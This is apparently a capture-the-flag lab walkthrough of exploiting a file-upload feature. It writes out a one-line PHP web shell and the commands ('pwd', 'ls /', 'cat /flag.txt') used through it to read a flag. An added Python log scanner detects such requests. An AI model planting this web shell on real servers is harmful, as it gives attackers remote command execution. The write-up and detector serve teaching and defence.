Upload Exploitation

Try to exploit the upload feature to upload a web shell and get the content of /flag.txt

This lab consists of obtaining web shell access through the web application. There may be multiple ways to do this, so I'll just show how I did it.

First create a simple custom web shell:

<?php system($_REQUEST['cmd']); ?>

Access the web application and upload the web shell.

After the file has been uploaded, click on Download File and you will be redirected to this page. We are now accessing the file we just uploaded. Since the script expects a command, we have to pass it in the cmd parameter.

?cmd=pwd

Since we passed the pwd command, we got the output that we were expecting. So we can confirm we have web shell access.

Now all we have to do is search for the flag, which in this case is in the root directory.

?cmd=ls /

Here it is! Now let's see the content of the flag:

?cmd=cat /flag.txt

And we got it!
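As an added example (not part of the original write-up), this is how the three requests above look from the defender's side: a Python sketch that flags access-log entries where a script under the upload directory is requested with a command-like parameter. The `/uploads/` path, the `shell.php` file name and the log lines are assumptions constructed for illustration, since the lab's real paths are not given here.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: uploads are served from /uploads/ (the lab's real path is not given).
UPLOAD_PREFIX = "/uploads/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Values that look like shell commands, as in the walkthrough's cmd= requests.
SHELL_VALUE = re.compile(r"^\s*(pwd|id|whoami|uname|ls|cat|find)\b")
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines in combined log format (not taken from the lab).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "POST /upload.php HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /uploads/shell.php?cmd=pwd HTTP/1.1" 200 14
203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /uploads/shell.php?cmd=ls%20/ HTTP/1.1" 200 96
203.0.113.7 - - [01/Jan/2024:10:00:21 +0000] "GET /uploads/shell.php?cmd=cat+/flag.txt HTTP/1.1" 200 33
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /uploads/avatar.png HTTP/1.1" 200 20480
198.51.100.4 - - [01/Jan/2024:10:01:05 +0000] "GET /search.php?q=cat+pictures HTTP/1.1" 200 900
"""

def classify(line):
    """Return the list of reasons a log line is suspicious (empty if none)."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.startswith(UPLOAD_PREFIX):
        return []
    reasons = []
    if SCRIPT_EXT.search(url.path):
        reasons.append("script-in-upload-dir")
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if SHELL_VALUE.match(value):
            reasons.append(f"shell-like-param:{name}")
    return reasons

def scan(log_text):
    """Map each suspicious request target to its reasons."""
    hits = {}
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            hits[REQUEST.search(line).group("target")] = reasons
    return hits

if __name__ == "__main__":
    for target, reasons in scan(SAMPLE_LOG).items():
        print(target, reasons)
```

A request for any script file under the upload directory is already a finding on its own, because it means an uploaded file is being handed to the PHP interpreter instead of being served as static content.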
